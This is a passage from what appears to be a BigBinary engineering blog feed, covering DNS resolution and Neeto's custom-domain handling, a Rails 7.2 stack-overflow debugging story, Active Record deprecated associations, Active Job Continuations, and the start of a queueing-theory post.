hours forthe change to propoage. What does that mean?</p><p>If you type www.neeto.com into your browser, it uses its DNS cache. The browsermight not even ask anyone what the ip address of www.neeto.com is. This isbecause maybe 20 seconds ago you visited www.neeto.com and now you refreshed thepage.</p><p>If the browser really needs an updated DNS value, then the browser will sendthat request to your laptop. Your laptop has a DNS cache. Your laptop might notask anyone for the updated DNS value for a while.</p><p>Now, if the laptop needs to know the DNS valu,e then the laptop will ask for anansewr to the root servers.</p><p>There are only 13 root servers in the world. These root servers are named from&quot;A&quot; to &quot;M&quot;. However just because there are 13 root servers it doesn't mean thatthere are only 13 servers. Each of those 13 root servers are running behind lotsof physical servers.</p><p>The complete list of physical servers can be found at https://root-servers.org.</p><p>Root servers do not know the answer to every question. However, they do know theaddress of the servers that can answer your questions. For example, if your TLDis <code>.com</code>, then the root server will send you to a different server. If your TLDis <code>.net</code> then you will asked to go to a different machine. Similarly, there areservers to serve TLDs like <code>.co.uk</code>, <code>.in</code> etc.</p><p><img src="/blog_images/2026/dns-basics-and-how-dns-works-in-neeto/domain-hierarchy.png" alt="Domain hierarchy"></p><p>Note that at each layer, there is some amount of DNS caching. To ensure that theupdated value is completely updated throughout the Internet of the whole worldwe need to give some time for the old cached value to be removed.</p><p>The way these servers work also shows the decentralized nature of DNS. There isno one single place where all the DNS values of the world is stored. DNS valuesare stored at different places, but there is a path to get to those values allthe way from the root servers.</p><h2>neeto-custom-domains-frontend package</h2><p>Adding a custom domain could be intimidating. People are asked to change DNSrecords, which they might not have touched for years. A small misconfigurationhas the potential to bring the whole website down. To ensure that the userexperience of adding a &quot;custom domain&quot; is great, we at<a href="https://neeto.com">Neeto</a> decided to go the extra mile.</p><p>We bought one domain each at the following name registrars:</p><ul><li>Cloudflare</li><li>Namecheap</li><li>Hostinger</li><li>Digital Ocean</li><li>Wix</li><li>Porkbun</li><li>Squarespace</li><li>AWS route 53</li><li>Network solutions</li><li>Godaddy</li><li>Strato</li><li>Microsoft 365</li></ul><p>We checked out how they ask their users to make DNS entries and we captured thescreenshots. Now, depending on what &quot;name server&quot; the user is dealing with wedisplay a help message and help screens customized for that user.</p><p>For example, if a user is using Cloudflare as their name server then the helpscreen might look like this.</p><p><img src="/blog_images/2026/dns-basics-and-how-dns-works-in-neeto/custom-domain-neeto-help-for-cloudflare.png" alt="Adding custom domain for cloudflare"></p><p>Notice that the above image has a column called &quot;Proxy&quot; which is cloudflarespecific.</p><p>If the domain registrar is GoDaddy then the help screen might look like this.</p><p><img src="/blog_images/2026/dns-basics-and-how-dns-works-in-neeto/dns-in-neeto-godaddy.png" alt="Adding custom domain for GoDaddy"></p><p>At <a href="https://neeto.com">Neeto</a> we build a number of products and almost all theproducts need the feature of &quot;custom domain&quot;. To share the code related todomain handling in a consistent manner, we have built a utility tool named<code>neeto-custom-domains-engine</code>.</p><p>When a user adds a domain to the Neeto product, this tool finds the name serverof that domain. Then we check if we have the custom help screen and helpinstructions for that name server or not. If we don't, then we provide generichelp instructions.</p><h2>Validating DNS records</h2><p>Now that the user has added the custom domain, Neeto needs to verify that thoseDNS records are indeed added.</p><p>If a user tries to add the domain <code>www.spinjudo.com</code>, then Neeto will ask theuser to add following CNAME for <code>www</code>.</p><table><thead><tr><th>Name</th><th>value</th></tr></thead><tbody><tr><td>www</td><td>dns.neetodeployapp.com</td></tr></tbody></table><p>Now, let's assume that the user has added that record. Now we need to verifythis record. Let's execute the following command from the terminal.</p><pre><code class="language-sh">nslookup -type=CNAME www.spinjudo.com</code></pre><p>We should see a response similar to this:</p><pre><code class="language-sh">Non-authoritative answer:www.spinjudo.comcanonical name = dns.neetodeployapp.com.</code></pre><p>Here We can see that the DNS record has propagated properly for this domain andit's receiving the expected value. Now, let's see how this would look for arecord without the proper records added.</p><pre><code class="language-sh">nslookup -type=CNAME www.spinjudo2.com</code></pre><p>This is the response we will get for <code>spinjudo2</code>.</p><pre><code class="language-sh">Non-authoritative answer:*** Can't find www.spinjudo2.com: No answer</code></pre><p>This could mean two things.</p><ol><li>Either the user has not added the records properly.</li><li>The records have been added, but they have not propagated properly. Sometimesit can take upto 48 hours for the added records to be seen.</li></ol><p>In this case we saw the example of validating CNAME records. However sameprocess is followed when it comes to validating A records or AAAA records.</p><h2>Traefik to route the custom domain</h2><p>Typically, when it comes to deploying an application one can deploy theapplication using services like Heroku, Render, Railways or directly on cloudservices like EC2, GCP, Azure etc. At Neeto, we decided to build NeetoDeploy.It's a service similar to Heroku for our internal use.</p><p>NeetoDeploy uses <a href="https://traefik.io/traefik">Traefik</a>, which is a leadingmodern open source reverse proxy. In simple terms, Traefik is a load balancer.All requests come to the load balancer and then the requests are routed to theright place.</p><p>Earlier, we talked about setting up a custom domain. I have setup custom domainfor <code>https://calendar.spinjudo.com</code>. As part of setting up a custom domain, Iadded a CNAME for <code>dns.neetodeployapp.com</code>.</p><p>After adding the CNAM,E Neeto validated the record. Once Neeto determines thatthe user has correctly added the CNAME then Neeto adds these custom domains toTraefik. In reality, four records are added as shown in the picture.</p><p><img src="/blog_images/2026/dns-basics-and-how-dns-works-in-neeto/spinjudo-traefik.png" alt="Adding domains to traefik"></p><p>In total, we see four records. The first records are &quot;websecure&quot;. It means theyhave <code>https</code> turned on. The last two are just <code>web</code>. It means they support<code>http</code>.</p><p>Once a request for a domain for <code>calendar.spinjudo.com</code> comes, then thoserequests will be sent to NeetoDeploy's Traefik. Traefik will map that<code>calendar.spinjudo.com</code> to an instance of the NeetoCal application and therequest will be forwarded to that server.</p><p>Please note that Traefik doesn't fulfill the request. Traefik acts as a loadbalancer and sends the request to the right server.</p><p><img src="/blog_images/2026/dns-basics-and-how-dns-works-in-neeto/traefik-handling-requests.png" alt="Traefik handling requests"></p><h2>Finding the ip address</h2><p>When a user types https://calendar.spinjudo.com, then the browser needs to knowthe ip address to which to hit. In other words, we ultimately need to know the Arecord.</p><p>We can use the tool <code>dig</code> to find the final A record value when a user visitshttps://calendar.spinjudo.com. First, let's see the tool in action.</p><pre><code class="language-sh">dig +noall +answer calendar.spinjudo.com A</code></pre><p>The response we get is following:</p><pre><code class="language-sh">calendar.spinjudo.com. 60 INCNAMEdns.neetodeployapp.com.dns.neetodeployapp.com.60INCNAMEa7b4fc193275e43ea9ba2b7753b080dc-6ad6aaca90bd0ea4.elb.us-east-1.amazonaws.com.a7b4fc193275e43ea9ba2b7753b080dc-6ad6aaca90bd0ea4.elb.us-east-1.amazonaws.com. 60 IN A 34.233.85.113</code></pre><p>The first line is a CNAME to <code>dns.neetodeployapp.com</code>.</p><p>The second line is a CNAME to an EC2 instance on AWS.</p><p>The third line is an A record, which gives us the ip address of the machine.</p><p>In the above command, we used <code>+noall</code> and <code>+answer</code>. The <code>+noall</code> is reallyuseful. It means &quot;just hide all the output&quot;. By default, <code>dig</code> output spits alot of information. By using <code>+noall</code> we tell <code>dig</code> to go on quite mode.</p><p>And then we tell <code>dig</code> to show data for the &quot;answer&quot; section by using <code>+answer</code>.</p><p>Similarly, using <code>dig +noall +authority</code> will show only the data about the&quot;authority&quot; section.</p><h2>Issuing SSL certificate</h2><p>We know that a user can visit http://spinjudo.com or the user can also visithttps://spinjudo.com. To serve HTTPS, we need SSL certificates.</p><p>We can use the user to purchase SSL certificate, configure it and apply it butthat would be too cumbersome for our users.</p><p>To generate SSL certificate we will use<a href="https://letsencrypt.org/">Let's Encrypt</a> which issues free trusted SSLcertificates.</p><p>SSL certificates are issued using the Automatic Certificate ManagementEnvironment (ACME) protocol by Let's Encrypt. This is a simple protocol by whichthe service can verify the authenticity and ownership of the requested website.</p><p>The process of domain validation, issuinga certificate and then renewingcertificate could be a bit daunting. To make life easier, Let's Encrypt hasprovided <a href="https://certbot.eff.org/">certbot</a>. This tool makes it easier to getSSL certificate from Let's Encrypt.</p><p>It's worth noting that the certificate issued by Let's Encrypt is valid only for3 months. Before the certificate expires, we need to ask Let's Encrypt to issuea new certificate and that certificate will be valid for another 90 days.</p><h2>NeetoCal using Cloudflare</h2><p><a href="https://neeto.com/cal">NeetoCal</a> and other Neeto products use Cloudflare astheir name servers.</p><p>If we look at the NeetoCal DNS record, then this is what we see.</p><p><img src="/blog_images/2026/dns-basics-and-how-dns-works-in-neeto/neetocal-dns-record.png" alt="NeetoCal DNS record"></p><p>Adding a <code>*</code> in place of the name of the record is known as a wildcardcharacter. This serves as a catch-all for any undefined subdomain, meaning allthe subdomains that do not have an explicit DNS record associated with it willbe matched by this record. As we can see in the picture above, the <code>*</code> value isproxied. What it means is that any attempt to connect to the NeetoCal IP addressfirst hits the Cloudflare server. Cloudflare server runs a bunch of checks onthe incoming requests, and then passes that request to the intended IP address.</p><p>For example, if I'm getting a lot of spammy requests from Spain, then I canconfigure Cloudflare to prevent requests coming from Spain. Or I can rate limitrequests for <code>/login</code> url and things like that.</p><p>If we do not use proxy, then that means the user is directly connecting to theNeeto server and Cloudflare is not in the picture. In this case, if a<a href="https://www.cloudflare.com/en-gb/learning/ddos/what-is-a-ddos-attack/">DDoS</a>attack happens, then Cloudflare will not be able to protect us.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Debugging a Stack Overflow in Rails 7.2.1.1]]></title>
       <author><name>Vishnu M</name></author>
      <link href="https://www.bigbinary.com/blog/debugging-stack-overflow-in-rails"/>
      <updated>2025-11-25T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/debugging-stack-overflow-in-rails</id>
      <content type="html"><![CDATA[<p>A few weeks ago, after upgrading <a href="https://www.neeto.com/neetocal">NeetoCal</a> fromRails 7.1.5.2 to Rails 7.2.1.1, we started seeing mysterious crashes inproduction with the error message <code>SystemStackError: stack level too deep</code>.</p><h2>Identifying the problem</h2><p>The crash happened inside <code>Slots::SyncAllCalendarsService</code>, a service that syncsmultiple calendars concurrently using the <code>Async</code> gem. What made it particularlypuzzling was that switching from <code>Async::Barrier</code> to <code>Thread.new</code> made the errordisappear. This led us down a rabbit hole thinking it was an Async-specificissue.</p><p>The stack trace pointed to a strange location:</p><pre><code>activerecord (7.2.1.1) lib/arel/visitors/to_sql.rb:898:in `each'  from lib/arel/visitors/to_sql.rb:898:in `each_with_index'  from lib/arel/visitors/to_sql.rb:898:in `inject_join'  from lib/arel/visitors/to_sql.rb:627:in `visit_Arel_Nodes_Or'  ... 1132 levels...</code></pre><p>Over a thousand levels deep into <code>visit_Arel_Nodes_Or</code>. That's unusual. Whywould visiting OR nodes in a SQL query cause such deep recursion?</p><p>The stack trace mentioned <code>Slots::SyncAllCalendarsService</code>, but that serviceitself had nothing obviously wrong. It was just iterating through calendars andsyncing them. We traced deeper into the code and found the actual culprit inNeeto's <code>Integrations::Icloud::SyncEventsService</code>:</p><pre><code class="language-ruby">def abandoned_events  pairs = event_params.map { |e| [e[:url], e[:recurrence_id]] }  @_abandoned_events = calendar.events    .where(&quot;start_time BETWEEN ? AND ?&quot;, start_time, end_time)    .where.not([:url, :recurrence_id] =&gt; pairs)end</code></pre><p>This code finds &quot;abandoned&quot; events by excluding events that match specific URLand recurrence ID combinations. In production, <code>pairs</code> contained 233 entries.Nothing immediately suspicious, right?</p><p>To understand what was happening, we needed to see what Rails was actually doingwith this query. The <code>where.not([:url, :recurrence_id] =&gt; pairs)</code> syntax isRails' composite key feature. With 233 pairs, Rails generates SQL like this:</p><pre><code class="language-sql">WHERE NOT (  (url = 'url1' AND recurrence_id = 'rec1') OR  (url = 'url2' AND recurrence_id = 'rec2') OR  (url = 'url3' AND recurrence_id = 'rec3') OR  -- ... 230 more OR clauses)</code></pre><p>233 OR clauses. That's a lot, but databases can handle it. The problem wasn'tthe SQL itself - it was how Rails built the internal representation of thatquery.</p><h2>Going into Rails Internals</h2><p>To really understand what changed, we used <code>bundle open activerecord</code> to look atthe Rails source code. We compared the same code in Rails 7.1.5.2 and 7.2.1.1.</p><h3>What We Found in Rails 7.1.5.2</h3><p>In Rails 7.1.5.2, the code that visits OR nodes looked like this:</p><pre><code class="language-ruby">def visit_Arel_Nodes_Or(o, collector)  stack = [o.right, o.left]  while o = stack.pop    if o.is_a?(Arel::Nodes::Or)      stack.push o.right, o.left    else      visit o, collector      collector &lt;&lt; &quot; OR &quot; unless stack.empty?    end  end  collectorend</code></pre><p>This is an iterative approach using a manual stack. No matter how deeply nestedthe OR conditions are, this code only uses a single stack frame for the<code>visit_Arel_Nodes_Or</code> method. It's stack-safe.</p><h3>What Changed in Rails 7.2.1.1</h3><p>In Rails 7.2.1.1, the same method became much simpler:</p><pre><code class="language-ruby">def visit_Arel_Nodes_Or(o, collector)  inject_join o.children, collector, &quot; OR &quot;end</code></pre><p>Where <code>inject_join</code> does:</p><pre><code class="language-ruby">def inject_join(list, collector, join_str)  list.each_with_index do |x, i|    collector &lt;&lt; join_str unless i == 0    collector = visit(x, collector)  # Recursive call  end  collectorend</code></pre><p>This is a recursive approach. If an OR node contains another OR node, it calls<code>visit</code>, which calls <code>visit_Arel_Nodes_Or</code>, which calls <code>inject_join</code> again. Therecursion depth grows with the nesting depth of the OR tree.</p><h2>The Tree Structure Problem</h2><p>But why is the OR tree so deeply nested? We found the answer in Active Record's<code>PredicateBuilder#grouping_queries</code>:</p><pre><code class="language-ruby">def grouping_queries(queries)  if queries.one?    queries.first  else    queries.map! { |query| query.reduce(&amp;:and) }    queries = queries.reduce { |result, query| Arel::Nodes::Or.new([result, query]) }    Arel::Nodes::Grouping.new(queries)  endend</code></pre><p>That <code>reduce</code> call is the key. It builds a left-deep nested tree:</p><pre><code>Level 1:  Query1 OR Query2 = OR_Node_1Level 2:  OR_Node_1 OR Query3 = OR_Node_2Level 3:  OR_Node_2 OR Query4 = OR_Node_3...Level 232: OR_Node_231 OR Query233 = OR_Node_232</code></pre><p>With 233 pairs, this creates 232 levels of nesting. Each level addsapproximately 5 stack frames when Rails traverses it recursively. That's 1,160stack frames just for the query building.</p><h2>The Async Connection</h2><p>Why did <code>Thread.new</code> work but <code>Async::Barrier</code> didn't?</p><p>We wrote a test script to measure the actual stack depth limits in differentcontexts:</p><pre><code class="language-ruby">def test_recursion_depth(context_name)  depth = 0  recurse = lambda do |n|    depth = n    recurse.call(n + 1)  end  begin    recurse.call(0)  rescue SystemStackError    return depth  endendthread_depth = nilThread.new do  thread_depth = test_recursion_depth(&quot;thread&quot;)end.joinputs &quot;Thread recursion limit: ~#{thread_depth} calls&quot;async_depth = nilAsync do  async_depth = test_recursion_depth(&quot;async&quot;)endputs &quot;Async fiber recursion limit: ~#{async_depth} calls&quot;</code></pre><p>When we ran this, the results were revealing:</p><pre><code>Thread recursion limit:      ~11910 callsAsync fiber recursion limit: ~1482 calls</code></pre><p>Threads have roughly 8x more stack space than Async fibers. This is becausethreads use larger stacks (1MB-8MB) while fibers are designed to be lightweightwith smaller stacks (512KB-1MB). This difference in stack allocation is whythreads can handle deeper recursion before hitting the overflow limit.</p><p>With 233 pairs requiring ~1,160 stack frames, we were right at the edge of theAsync fiber limit. But we were still well within the thread limit, which is whyswitching to <code>Thread.new</code> seemed to fix it.</p><p>When we tested with 500 pairs (which some of our larger calendars had), even<code>Thread.new</code> failed with a stack overflow. So it wasn't really a fix, it justpushed the problem further down the road.</p><h2>The GitHub Trail</h2><p>After we understood the problem, we searched the Rails repository and found theexact history:</p><ol><li><p><strong>April 4, 2024 - <a href="https://github.com/rails/rails/pull/51492">PR #51492</a></strong>:This PR changed OR nodes from <strong>binary</strong> to <strong>n-ary</strong> to handle multiplechildren in a single node.</p></li><li><p><strong>September 24, 2024 -<a href="https://github.com/rails/rails/issues/53031">Issue #53031</a></strong>: Someonereported the exact issue we were seeing. Queries with 800+ OR conditions thatworked in Rails 7.1 now crashed in Rails 7.2.</p></li><li><p><strong>September 25, 2024 -<a href="https://github.com/rails/rails/pull/53032">PR #53032</a></strong>:<a href="https://github.com/fatkodima">fatkodima</a> fixed it with a one-line change in<code>PredicateBuilder#grouping_queries</code>:</p></li></ol><p><strong>Before:</strong></p><pre><code class="language-ruby">queries = queries.reduce { |result, query| Arel::Nodes::Or.new([result, query]) }</code></pre><p><strong>After:</strong></p><pre><code class="language-ruby">queries = Arel::Nodes::Or.new(queries)</code></pre><p>The difference is profound. The old code using <code>reduce</code> created a deeply nestedstructure like Russian nesting dolls:</p><pre><code>Or([Or([Or([Query1, Query2]), Query3]), Query4])  # 232 levels with 233 pairs</code></pre><p>The new code creates a flat structure:</p><pre><code>Or([Query1, Query2, Query3, Query4, ...Query233])  # Just 1 level</code></pre><p>With a flat structure, the recursive visitor only traverses one level instead of232, eliminating the stack overflow. The fix is available in Rails 7.2.2+.</p><h2>Our Solution</h2><p>We're currently on Rails 7.2.1.1 and upgrading immediately would requireextensive testing. So we implemented a workaround in our code:</p><pre><code class="language-ruby">def abandoned_events  return @_abandoned_events if defined?(@_abandoned_events)  pairs = event_params.map { |e| [e[:url], e[:recurrence_id]] }  return if pairs.empty?  events_in_time_range = calendar.events    .where(&quot;start_time BETWEEN ? AND ?&quot;, start_time, end_time)  # Get candidate events using simple IN clauses  urls = pairs.map(&amp;:first).uniq  recurrence_ids = pairs.map(&amp;:last).uniq  candidate_events = events_in_time_range    .where(url: urls)    .where(recurrence_id: recurrence_ids)  # Filter to exact pairs in memory  pairs_set = pairs.to_set  ids_to_exclude = candidate_events.select { |event|    pairs_set.include?([event.url, event.recurrence_id])  }.map(&amp;:id)  @_abandoned_events = if ids_to_exclude.empty?    events_in_time_range  else    events_in_time_range.where.not(id: ids_to_exclude)  endend</code></pre><p>This approach:</p><ul><li>Uses simple IN clauses instead of complex OR conditions</li><li>Filters the exact pairs in memory (fast with a Set)</li><li>Excludes by ID, which is a flat list</li><li>Never builds deeply nested Arel nodes</li></ul><p>The trade-off is we run 2 queries instead of 1, but the queries are simpler andmore efficient. The in-memory filtering is negligible since we're alreadyconstrained by time range.</p><h2>Measuring and Verifying</h2><p>To prove our hypothesis, we wrote verification scripts that patched Railsinternals to measure what was actually happening.</p><h3>Counting Arel Visitor Calls</h3><p>We created a script that patched <code>visit_Arel_Nodes_Or</code> to count how many timesit was called and how deep the recursion went:</p><pre><code class="language-ruby">module Arel  module Visitors    class ToSql      alias_method :original_visit_Arel_Nodes_Or, :visit_Arel_Nodes_Or      def visit_Arel_Nodes_Or(o, collector)        @or_call_count ||= 0        @or_call_count += 1        @max_depth ||= 0        @current_depth ||= 0        @current_depth += 1        @max_depth = [@max_depth, @current_depth].max        result = original_visit_Arel_Nodes_Or(o, collector)        @current_depth -= 1        result      end    end  endend</code></pre><p>Results with 50 test pairs:</p><ul><li><strong>Rails 7.1.5.2</strong>: <code>visit_Arel_Nodes_Or</code> was called 1 time and max recursiondepth was 0.</li><li><strong>Rails 7.2.1.1</strong>: <code>visit_Arel_Nodes_Or</code> was called 49 times and max recursiondepth was 100.</li></ul><p>With 233 pairs in production:</p><ul><li><strong>Rails 7.1.5.2</strong>: Still called 1 time, depth 0 (iterative approach)</li><li><strong>Rails 7.2.1.1</strong>: Called 232 times, depth ~466 (exceeds Async fiber limit)</li></ul><h3>Testing the Actual Breaking Points</h3><p>We ran the problematic query with different pair counts to find exactly where itbreaks:</p><pre><code class="language-ruby"># Test with AsyncAsync do  pairs = calendar.events.limit(count).pluck(:url, :recurrence_id)  calendar.events.where.not([:url, :recurrence_id] =&gt; pairs).countend.wait# Test with ThreadThread.new do  pairs = calendar.events.limit(count).pluck(:url, :recurrence_id)  calendar.events.where.not([:url, :recurrence_id] =&gt; pairs).countend.join</code></pre><p>Results:</p><ul><li><strong>Async Fiber</strong>: Breaks at approximately 233 pairs</li><li><strong>Thread.new</strong>: Breaks at approximately 500 pairs</li></ul><p>This confirmed that Thread.new wasn't a real solution - it just had moreheadroom before hitting the same problem.</p><p>For now, we're sticking with our workaround. It works reliably, performs well,and doesn't require upgrading Rails immediately. When we do upgrade to Rails7.2.2+, we can revert to the original clean syntax, knowing that the Rails teamhas fixed the underlying issue.</p><p>If you're on Rails 7.2.0 through 7.2.1.x and use composite key queries withlarge datasets, watch out for this issue. The fix is in Rails 7.2.2+, or you canwork around it like we did.</p><h2>References</h2><ul><li><a href="https://github.com/rails/rails/pull/51492">PR #51492 - Bug introduced</a></li><li><a href="https://github.com/rails/rails/issues/53031">Issue #53031 - Bug reported</a></li><li><a href="https://github.com/rails/rails/pull/53032">PR #53032 - Bug fixed</a></li></ul>]]></content>
    </entry><entry>
       <title><![CDATA[Active Record adds support for deprecating associations]]></title>
       <author><name>Chirag Shah</name></author>
      <link href="https://www.bigbinary.com/blog/active-record-deprecated-associations"/>
      <updated>2025-07-03T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/active-record-deprecated-associations</id>
      <content type="html"><![CDATA[<p>In Rails8, we can now mark ActiveRecord associations as deprecated. This makesit easy to phase out old associations from our codebase, while still keepingthem around to safely remove their usage. Whenever a deprecated association isused, whether by calling the association, executing a query that references it,or triggering a sideeffect like <code>:dependent</code> or <code>:touch</code>, Rails will alert usaccording to our chosen reporting mode.</p><h3>Marking an association as deprecated</h3><p>Simply pass the <code>deprecated: true</code> option when declaring an association.</p><pre><code class="language-ruby">class User &lt; ApplicationRecord  has_many :meetings, deprecated: trueend</code></pre><p>Now, every time the meeting association is invoked, well get a deprecationwarning in our logs.</p><pre><code class="language-bash">&gt; user.meetingsThe association User#meetings is deprecated, the method meetings was invoked ((calendar):4:in '&lt;main&gt;')&gt; User.includes(:meetings).where(id: 1)The association User#meetings is deprecated, referenced in query to preload records ()&gt; User.joins(:meetings).where(id: 1)The association User#meetings is deprecated, referenced in query to join its table ()</code></pre><h3>Working with different association types</h3><p>We can deprecate any association type.</p><pre><code class="language-ruby">class Order &lt; ApplicationRecord  # has_many  has_many :line_items, deprecated: true  # belongs_to  belongs_to :customer, deprecated: true  # has_one  has_one :profile, deprecated: true  # has_many through  has_many :archived_comments, through: :comments, deprecated: trueend</code></pre><h3>Reporting modes and backtrace support</h3><p>This feature supports three deprecation modes:</p><ul><li><code>:warn</code> (default) Logs a warning to our ActiveRecord logger.</li><li><code>:raise</code> Raises an exception when the deprecated association is used.</li><li><code>:notify</code> Emits an Active Support notification event with the key<code>deprecated_association.active_record</code>. This can be used to send notificationsto external services like Honeybadger etc. We can check the details about itspayload<a href="https://edgeguides.rubyonrails.org/active_support_instrumentation.html#deprecated-association-active-record">here</a>.</li></ul><p>Backtraces are disabled by default. If <code>:backtrace</code> is true, <code>:warn</code> mode willinclude a clean backtrace in the message, and <code>:notify</code> mode will have a<code>backtrace</code> key in the payload. Exceptions raised via <code>:raise</code> mode will alwayshave a clean stack trace.</p><p>We can change the global default mode in an initializer.</p><pre><code class="language-ruby"># config/initializers/deprecated_associations.rbActiveRecord.deprecated_associations_options = {  mode: :warn,      # :warn | :raise | :notify  backtrace: true   # whether to include a cleaned backtrace}</code></pre><p>It can also be set at an environment level.</p><pre><code class="language-ruby"># config/environments/development.rbRails.application.configure do  config.active_record.deprecated_associations_options = { mode: :raise, backtrace: true }end# config/environments/production.rbRails.application.configure do  config.active_record.deprecated_associations_options = { mode: :warn, backtrace: true }end</code></pre><h3>Why deprecate rather than remove?</h3><p>In large applications, its often hard to guarantee complete test coverage. Someassociation usages may only surface in production.</p><p>Deprecating an association first, lets us:</p><ul><li>Identify every code path (tests, console, background jobs) that relies on it.</li><li>Gradually refactor those references before removal.</li><li>Ensure confidence that deleting the association wont break anythingunexpectedly.</li></ul><p>This new feature in Rails provides a clean and intuitive way to phase out ourassociations with deprecation warnings, making it easier to maintain andrefactor large codebases.</p><p><em>This feature <a href="https://github.com/rails/rails/pull/55285">was merged</a> recently,and will be released in the next Rails minor/patch version.</em></p>]]></content>
    </entry><entry>
       <title><![CDATA[Active Job Continuations]]></title>
       <author><name>Vishnu M</name></author>
      <link href="https://www.bigbinary.com/blog/active-jobs-continuations"/>
      <updated>2025-06-09T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/active-jobs-continuations</id>
      <content type="html"><![CDATA[<p>Active Job Continuations was recently merged into Rails. We recommend that you gothrough the description in the<a href="https://github.com/rails/rails/issues/55127">pull request</a> since they are sowell written.</p><p>If you prefer watching a video to learn about Active Job Continuations, then wemade a video for you.</p><p>&lt;iframewidth=&quot;560&quot;height=&quot;315&quot;src=&quot;https://www.youtube.com/embed/r4uuQh1Zog0&quot;title=&quot;YouTube video player&quot;frameborder=&quot;0&quot;allow=&quot;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture&quot;allowfullscreen</p><blockquote><p>&lt;/iframe&gt;</p></blockquote><p>In short, this feature allows you to configure your jobs in such a manner thatthe job can be interrupted and next time when the job starts, it'll start from aparticular point so that the work done so far is not totally wasted.</p><p>This work is highly inspired by Shopify's<a href="https://github.com/Shopify/job-iteration">job-iteration</a> gem.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Understanding Queueing Theory]]></title>
       <author><name>Vishnu M</name></author>
      <link href="https://www.bigbinary.com/blog/understanding-queueing-theory"/>
      <updated>2025-06-03T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/understanding-queueing-theory</id>
      <content type="html"><![CDATA[<p><em>This is Part 6 of our blog series on<a href="/blog/scaling-rails-series">scaling Rails applications</a>.</em></p><hr><h2>Queueing Systems</h2><p>In web applications, not every task needs to be processed immediately. When youupload a large video file, send a bulk email campaign, or generate a complexreport, these time-consuming operations are often handled in the background.This is where queueing systems like <a href="https://sidekiq.org/">Sidekiq</a> or<a href="https://github.com/rails/solid_queue">Solid Queue</a> comes into play.</p><p>Queueing theory helps us understand how these systems behave under differentconditions - from quiet periods to peak load times.</p><p>Let's understand the fundamentals of queueing theory.</p><h2>Basic Terminology in Queueing Theory</h2><ol><li><p><strong>Unit of Work</strong>: This is the individual item needing service - a job.</p></li><li><p><strong>Server</strong>: This is one &quot;unit of parallel processing capacity.&quot; In queuingtheory, this doesn't necessarily mean a physical server. It refers to theability to process one unit of work at a time. For JRuby or TruffleRuby, eachthread can be considered a separate &quot;server&quot; since they can execute inparallel. For CRuby/MRI, because of the GVL, the concept of a &quot;server&quot; isdifferent. We'll discuss it later.</p></li><li><p><strong>Queue Discipline</strong>: This is the rule determining which unit of work isselected next from the queue. For Sidekiq and Solid Queue, it is FCFS(FirstCome First Serve). If there are multiple queues, which job is selecteddepends on the priority of the queue.</p></li><li><p><strong>Service Time</strong>: The actual time it takes to process a unit of work (howlong a job takes to execute).</p></li><li><p><strong>Latency/Wait Time</strong>: How long jobs spend waiting in the queue before beingprocessed.</p></li><li><p><strong>Total Time</strong>: The sum of service time and wait time. It's the completeduration from when a job is enqueued until it finishes executing.</p></li></ol><h2>Little's law</h2><p>Little's law is a theorem in queuing theory that states that the average numberof jobs in a system is equal to the average arrival rate of new jobs multipliedby the average time a job spends in the system.</p><pre><code class="language-ruby">L = W</code></pre><p>L = Average number of jobs in the system <br> = Average arrival rate of new jobs <br>W = Average time a job spends in the system</p><p>For example, if jobs arrive at a rate of 10 per minute (), and each job takes30 seconds (W) to complete:</p><p>Average number of jobs in system = 10 jobs/minute * 0.5 minutes = 5 jobs</p><p>This helps us understand the current state of our system and that there are 5jobs in the system on average at any given moment.</p><p><code>L</code> is also called <strong>offered traffic</strong>.</p><p>Note: Little's Law assumes the arrival rate is consistent over time.</p><h3>Managing Utilization</h3><p>Utilization measures how busy our processing capacity is.</p><p>Mathematically, it is the ratio of how much processing capacity we're using tothe processing capacity we have.</p><pre><code class="language-ruby">utilization = (average number of jobs in the system/capacity to handle jobs) * 100</code></pre><p>In other words, it could be written as follows.</p><pre><code class="language-ruby">utilization = (offered_traffic / parallelism) * 100</code></pre><p>For example, if we are using Sidekiq to manage our background jobs then in asingle-threaded case, parallelism is equal to the number of Sidekiq processes.</p><p>Let's look at a practical case with numbers:</p><ul><li>We have 30 jobs arriving every minute</li><li>It takes 0.5 minutes to process a job</li><li>We have 20 Sidekiq processes</li></ul><p>In this case, the utilization will be:</p><pre><code class="language-ruby">utilization = ((30 jobs/minute * 0.5 minutes) / 20 processes) * 100 = 75%</code></pre><h3>High utilization is bad for performance</h3><p>Let's assume we maintain 100% utilization in our system. It means that if, onaverage, we get 30 jobs per minute, then we have just enough capacity to handle30 jobs per minute.</p><p>One day, we started getting 45 jobs per minute. Since utilization is at 100%,there is no extra room to accommodate the additional load. This leads to higherlatency.</p><p>Hence, having a high utilization rate may result in low performance, as it canlead to higher latency for specific jobs.</p><h3>The knee curve</h3><p>Mathematically, it would seem that only when the utilization rate hits 100%should the latency spike up. However, in the real world, it has been found thatlatency begins to increase dramatically when utilization reaches around 70-75%.</p><p>If we draw a graph between utilization and performance then the graph would looksomething like this.</p><p><img src="/blog_images/2025/understanding-queueing-theory/knee-curve.png" alt="The knee curve"></p><p>The point at which the curve bends sharply upwards is called &quot;Knee&quot; in theperformance curve. At this point, the exponential effects predicted by queueingtheory become pronounced, causing the queue latency to climb up quickly.</p><p>Running any system consistently above 70-75% utilization significantly increasesthe risk of spiking the latency, as jobs spend more and more time waiting.</p><p>This would directly impact the customer experience, as it could result in delaysin sending emails or making calls to Twilio to send SMS messages, etc.</p><p>Tracking this latency will be covered in the upcoming blogs. The tracking ofmetrics depends on the queueing backend used (Sidekiq or Solid Queue).</p><h2>Concurrency and theoretical parallelism</h2><p>In Sidekiq, a process is the primary unit of parallelism. However, concurrency(threads per process) significantly impacts a process's effective throughput.Because of GVL we need to take into account how long the job is waiting for I/O.</p><p>The more time a job spends waiting on external resources (like databases orAPIs) rather than executing Ruby code, the more other threads within the sameprocess can run Ruby code while the first thread waits.</p><p>We learned about Amdahl's law in<a href="/blog/amdahls-law-the-theoretical-relationship-between-speedup-and-concurrency">Part 3</a>of this series.</p><p><img src="/blog_images/2025/understanding-queueing-theory/amdahls-law.png" alt="Amdahl's law"></p><p>Where:</p><p><code>p</code> is the portion that can be parallelized (the 